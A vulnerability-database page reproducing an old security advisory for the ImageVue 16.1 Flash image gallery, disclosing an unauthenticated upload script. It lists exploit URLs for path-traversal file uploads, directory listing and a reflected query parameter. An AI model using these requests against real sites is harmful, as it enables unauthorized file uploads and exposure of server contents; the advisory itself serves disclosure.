Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

imageVue16.1.txt

🗓️ 13 Feb 2006 00:00:00Reported by zjiebType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

Online image gallery ImageVue 16.1 allows unauthorized file uploads and folder content viewin

Show more
Code
`ImageVue is an online Flash gallery for viewing images. For more information about ImageVue visit http://www.imagevuex.com  
  
Credits: me  
  
Vulnerable Systems:  
imageVue16.1  
  
In ImageVue one can upload images to the Gallery. The upload-script however isn't checking credentials nor does it check file extensions i.e. it's possible for any user to upload any file as long as the 'right' permissions have been set for the uploading folder.  
  
Exploit:  
1) check folder permissions  
http://[target]/dir.php  
An XML-document is shown containing all folders and their permissions.  
2) upload a file to a folder from the XML  
http://[target]/admin/upload.php?path=../[foldername]  
Now you're ready to upload any file.  
  
Other vulnerabilities:  
1) view dir listings  
http://[target]/readfolder.php?path=[path]&ext=[extension]  
2) querystring is passed to style and body  
http://[target]/index.php?bgcol=[input]  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
13 Feb 2006 00:00Current
7.4High risk
Vulners AI Score7.4
imagevueflash galleryunauthorized uploadsfolder permissionsexploitvulnerabilities
19
.json
Report